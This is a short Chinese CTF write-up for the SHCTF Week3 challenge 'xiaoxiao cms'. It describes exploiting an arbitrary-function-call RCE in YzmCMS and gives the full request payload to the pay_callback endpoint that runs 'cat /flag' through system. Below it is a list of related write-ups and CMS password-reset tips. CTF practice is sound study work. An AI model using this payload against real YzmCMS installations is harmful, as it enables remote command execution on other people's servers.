首页 > 其他分享 >shctf[Week3] 小小cms

shctf[Week3] 小小cms

时间:2024-10-24 20:42:28浏览次数:8  
标签:no pay trade Week3 shctf cms payload out

看到首页面
了解到YzmCMS的版本,上网搜搜这个版本存在的漏洞
发现存在任意函数调用RCE的漏洞
https://blog.csdn.net/shelter1234567/article/details/138524342
根据文章直接抄payload,进入/pay/index/pay_callback目录下

下面cat /flag即可,最终的payload为
out_trade_no[0]=eq&out_trade_no[1]=cat /flag&out_trade_no[2]=system

标签:no,pay,trade,Week3,shctf,cms,payload,out
From: https://www.cnblogs.com/c1432/p/18500454

相关文章

  • SHCTF(week 2)web-wp
    1.guess_the_number:F12后查看源码并下载,由于可以获得第一个数,要知道seed可以使得每次生成的随机数一样,我们考虑爆seed,写脚本如下:importrandomdefr1(seed):random.seed(seed)returnrandom.randint(1000000000,9999999999)forseedinrange(1000000,9999999):......
  • SHCTF(week 1)web-wp
    1.1zflask:题目描述问robots有什么用,那就进入/robots.txt目录找到/s3recttt,下面根据下载的文件内容进入/api目录,覆盖SSHCTFF变量?SSHCTFF=cat/flag就可以得到flag。2.MD5Master:使用fastcoll生成指定头文件的MD5碰撞,下面拖到16进制编译器去个头,并url编码发过去就行(这里不要用......
  • cms 修改mysql密码忘记_aspcms忘记登陆密码 修改后台密码
    备份数据库:在进行任何数据库操作之前,请确保备份当前的数据库,以防止数据丢失。登录数据库:使用数据库管理工具(如phpMyAdmin)登录到你的数据库。找到用户表:寻找名为 Aspcms_Admins 的表,这是存储管理员账户信息的表。编辑用户记录:找到用户名为 admin 的记录......
  • 帝国CMS 忘记后台账号和密码的处理方法
    如果你忘记了帝国CMS的后台管理账号和密码,可以通过以下步骤进行重置:5.1至7.0版本备份数据库:在进行任何数据库操作之前,请确保备份当前的数据库,以防止数据丢失。登录数据库:使用数据库管理工具(如phpMyAdmin)登录到你的数据库。找到用户表:寻找名为 phome_enewsus......
  • 帝国CMS忘记后台登录认证码处理方法
    查看配置文件:打开 e/class/config.php 文件(对于帝国CMS7.5,路径为 e/config/config.php)。查找 $ecms_config['esafe']['loginauth'] 变量的内容。忘记后台登录安全答案登录数据库:使用数据库管理工具(如phpMyAdmin)登录到你的数据库。找到用户附加表:寻找名为......
  • 忘记帝国CMS后台密码的解决方法
    使用phpMyAdmin重置密码登录phpMyAdmin打开浏览器,输入phpMyAdmin的访问地址,通常为 http://yourdomain.com/phpmyadmin。使用数据库管理账号登录。选择数据库在左侧的数据库列表中,找到并点击包含 phome_enewsuser 表的数据库。修改用户表点击 phome_enewsuse......
  • DedeCMS后台管理员密码忘记的解决方法
    如果你忘记了DedeCMS的后台管理密码,可以通过以下步骤进行重置:备份数据库:在进行任何数据库操作之前,请确保备份当前的数据库,以防止数据丢失。登录数据库:使用数据库管理工具(如phpMyAdmin)登录到你的数据库。找到用户表:寻找名为 dede_admin 的表,这是存储管理员账户......
  • 苹果CMS v10 忘记管理员密码的重置方法
    如果你忘记了苹果CMSv10的后台管理密码,可以通过以下步骤进行重置:备份数据库:在进行任何数据库操作之前,请确保备份当前的数据库,以防止数据丢失。登录数据库:使用数据库管理工具(如phpMyAdmin)登录到你的数据库。如果你使用的是宝塔面板,可以通过宝塔面板的数据库管理功能登......
  • 帝国CMS后台admin帐号密码忘记的处理方法
    如果你忘记了帝国CMS的后台管理密码,可以通过以下步骤进行重置。具体步骤根据不同的版本有所不同:5.1至7.0版本备份数据库:在进行任何数据库操作之前,请确保备份当前的数据库,以防止数据丢失。登录数据库:使用数据库管理工具(如phpMyAdmin)登录到你的数据库。找到用户表:......
  • 海洋CMS忘记后台管理员密码解决方法
    如果你忘记了海洋CMS的后台管理密码,可以通过以下步骤进行重置:备份数据库:在进行任何数据库操作之前,请确保备份当前的数据库,以防止数据丢失。登录数据库:使用数据库管理工具(如phpMyAdmin)登录到你的数据库。找到用户表:寻找名为 sea_admin 的表,这是存储管理员账户信......